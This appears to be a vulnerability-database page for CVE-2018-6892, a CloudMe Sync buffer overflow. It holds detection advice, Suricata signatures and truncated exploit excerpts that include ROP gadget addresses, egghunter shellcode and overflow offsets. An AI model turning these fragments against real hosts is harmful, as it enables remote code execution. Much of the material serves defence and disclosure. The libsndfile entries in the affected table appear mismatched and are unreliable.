CVE-2018-6892
published 2018-02-11CVE-2018-6892: An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on…
PriorityP184critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
93.60%
99.8th percentile
An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cloudme | sync | <= 1.10.9 | — |
| cloudme | sync | — | — |
| libsndfile_project | libsndfile | >= 0 < 1.0.25-10ubuntu0.16.04.3 | 1.0.25-10ubuntu0.16.04.3 |
| libsndfile_project | libsndfile | >= 0 < 1.0.25-7ubuntu2.2+esm1 | 1.0.25-7ubuntu2.2+esm1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for TCP connections to port 8888 (CloudMe Sync listener); unauthenticated inbound connections from unexpected hosts should be alerted on. ↗
- →Detect oversized payloads (>1052–2232 bytes) sent to TCP/8888 as a network-level indicator of buffer overflow exploitation attempts against CloudMe Sync. ↗
- →Detect the egghunter tag 'boomboom' (\x62\x6f\x6f\x6d\x62\x6f\x6f\x6d) or 'w00tw00t' in network traffic to TCP/8888. ↗
- →Detect the egghunter tag 'w00tw00t' in network traffic to TCP/8888. ↗
- →Look for the CloudMe Sync process (CloudMe.exe) listening on 0.0.0.0:8888, which exposes it to unauthenticated remote attackers on all interfaces. ↗
- →CloudMe DLLs (Qt5Core.dll, Qt5Gui.dll, libstdc++-6.dll, icuin49.dll, icuuc49.dll, Qt5Network.dll, Qt5Sql.dll, libgcc_s_dw2-1.dll, LIBEAY32.dll, libwinpthread-1.dll, libGLESv2.dll) loaded without ASLR/SafeSEH are abused for ROP chains; verify these modules are not loaded with ASLR disabled. ↗
- ·The exploit targets CloudMe Sync versions 1.8.x, 1.9.x, 1.10.9, and 1.11.2; versions before 1.11.0 are confirmed vulnerable per the NVD advisory. ROP gadget addresses are version- and DLL-specific and will differ across installations. ↗
- ·The DEP-bypass ROP chain for v1.8.x/v1.9.x uses hardcoded gadget addresses from icuin49.dll, Qt5Core.dll, Qt5Gui.dll, libGLESv2.dll, LIBEAY32.dll, libwinpthread-1.dll, and icuuc49.dll; these addresses are only valid for those specific DLL versions. ↗
- ·The v1.10.9 exploit relies on ASLR and SafeSEH being disabled for CloudMe modules; the SEH overwrite at offset 2232 using 0x61e7b7f6 (Qt5Gui.dll) is only reliable when ASLR is off. ↗
- ·The WoW64 DEP-bypass exploit (46250) targets CloudMe 1.11.2 on Windows 7 SP1 x64 and uses a different EIP offset (1052) and gadget set compared to the x86 variants. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-whgv-r48w-wxh3: An issue was discovered in CloudMe 1
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2018-7886 [CRITICAL] CWE-119 GHSA-whgv-r48w-wxh3: An issue was discovered in CloudMe 1
An issue was discovered in CloudMe 1.11.0. An unauthenticated local attacker that can connect to the "CloudMe Sync" client application listening on 127.0.0.1 port 8888 can send a malicious payload causing a buffer overflow condition. This will result in code execution, as demonstrated by a TCP reverse shell, or a crash. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-6892.
GHSA
GHSA-8phr-7v4m-7r33: An issue was discovered in CloudMe before 1
ghsa_unreviewed·2022-05-13
CVE-2018-6892 [CRITICAL] CWE-119 GHSA-8phr-7v4m-7r33: An issue was discovered in CloudMe before 1
An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
OSV
libsndfile vulnerabilities
osv·2021-01-26·CVSS 9.8
CVE-2017-12562 libsndfile vulnerabilities
libsndfile vulnerabilities
It was discovered that libsndfile incorrectly handled certain malformed
files. A remote attacker could use this issue to cause libsndfile to
crash, resulting in a denial of service, or possibly execute arbitrary
code. (CVE-2017-12562)
It was discovered that libsndfile incorrectly handled certain malformed
files. A remote attacker could use this issue to cause libsndfile to
crash, resulting in a denial of service, or possibly execute arbitrary
code. This issue only affected Ubuntu 14.04 ESM. (CVE-2017-14245,
CVE-2017-14246, CVE-2017-14634, CVE-2017-16942, CVE-2017-6892,
CVE-2018-13139, CVE-2018-19432, CVE-2018-19661, CVE-2018-19662,
CVE-2018-19758, CVE-2019-3832)
Suricata
ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892)
suricata·2021-07-27·CVSS 9.8
CVE-2018-6892 [CRITICAL] ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892)
ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] 8888 (msg:"ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892)"; flow:established,to_server; content:"|90 90 90 90 90 90 90 90|"; offset:500; depth:800; content:"|90 90 90 90 90 90|"; within:64; reference:url,www.exploit-db.com/exploits/44175; reference:cve,2018-6892; classtype:attempted-admin; sid:2033448; rev:2; metadata:attack_target Server, created_at 2021_07_27, cve CVE_2018_6892, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Pu
Suricata
ET EXPLOIT CloudMe Sync Buffer Overflow
suricata·2018-06-29
CVE-2018-6892 ET EXPLOIT CloudMe Sync Buffer Overflow
ET EXPLOIT CloudMe Sync Buffer Overflow
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 8888 (msg:"ET EXPLOIT CloudMe Sync Buffer Overflow"; flow:established,to_server; content:"|fe e7 d1 61 a8 98 03 69 10 06 e7 6f 6f 0a c4 61 5a ea c8 68 e1 52 d6 68 a2 7c fa 68 ff fd ff ff|"; fast_pattern; distance:0; content:"|92 70 b4 6e 47 27 d5 68 ff ff ff ff bc 48 f9 68|"; distance:0; content:"|3c 06 f8 68 72 a4 f9 68 c0 ff ff ff 92 70 b4 6e|"; distance:0; content:"|ab 57 f0 61 a3 ef b5 6e d1 14 dc 61 0c ed b4 64 45 62 ba 61|"; distance:0; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; distance:0; reference:url,exploit-db.com/exploits/44784/; reference:cve,2018-6892; classtype:attempted-admin; sid:2025766; rev:2; metadata:attack_target Server, created_at 2018_06_29, cve CVE_
Exploit-DB
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)
exploitdb·2020-09-29·CVSS 9.8
CVE-2018-6892 [CRITICAL] CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)
---
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
# Exploit Author: Bobby Cooke (boku)
# CVE: CVE-2018-6892
# Date: 2020-09-29
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: 1.11.2
# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041
# Script: Python 2.7
# Notes:
# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the
# Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be
# running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required
# to create new users on the system. This exploit has been tested against multiple Wi
Exploit-DB
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)
exploitdb·2019-01-28·CVSS 9.8
CVE-2018-6892 [CRITICAL] CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)
---
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218
import socket
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68aef542,
Exploit-DB
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
exploitdb·2019-01-22·CVSS 9.8
CVE-2018-6892 [CRITICAL] CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
---
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !
#############################################################
import socket
egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
"\xaf\x75
Exploit-DB
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
exploitdb·2018-08-14·CVSS 9.8
CVE-2018-6892 [CRITICAL] Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
---
# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
# Date: 2018-08-13
# Exploit Author: Raymond Wellnitz
# Vendor Homepage: https://www.cloudme.com
# Version: 1.8.x/1.9.x
# Tested on: Windows 7 x64
# CVE : 2018-6892
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
'Description' => %q{
This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
},
'Author' => [ 'Raymond Wellnitz' ],
'References' =>
[
[ 'CVE', 'CVE-2018-6892' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space'
Exploit-DB
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)
exploitdb·2018-02-26
CVE-2018-6892 CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2
Exploit-DB
CloudMe Sync < 1.11.0 - Buffer Overflow
exploitdb·2018-02-13·CVSS 9.8
CVE-2018-6892 [CRITICAL] CloudMe Sync < 1.11.0 - Buffer Overflow
CloudMe Sync MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
C:\>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504
TCP [::]:8888 [::]:0 LISTENING 15504
Buffer Overflow:
EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
Stack Dump:
(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=000914
Metasploit
CloudMe Sync v1.10.9
metasploit
CloudMe Sync v1.10.9
CloudMe Sync v1.10.9
This module exploits a stack-based buffer overflow vulnerability in CloudMe Sync v1.10.9 client application. This module has been tested successfully on Windows 7 SP1 x86.
No writeups or analysis indexed.
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txthttp://packetstormsecurity.com/files/157407/CloudMe-1.11.2-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/158716/CloudMe-1.11.2-SEH-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/159327/CloudMe-1.11.2-Buffer-Overflow.htmlhttps://blogs.securiteam.com/index.php/archives/3669https://www.exploit-db.com/exploits/44027/https://www.exploit-db.com/exploits/44175/https://www.exploit-db.com/exploits/45197/https://www.exploit-db.com/exploits/46250/https://www.exploit-db.com/exploits/48840http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txthttp://packetstormsecurity.com/files/157407/CloudMe-1.11.2-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/158716/CloudMe-1.11.2-SEH-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/159327/CloudMe-1.11.2-Buffer-Overflow.htmlhttps://blogs.securiteam.com/index.php/archives/3669https://www.exploit-db.com/exploits/44027/https://www.exploit-db.com/exploits/44175/https://www.exploit-db.com/exploits/45197/https://www.exploit-db.com/exploits/46250/https://www.exploit-db.com/exploits/48840
2018-02-11
Published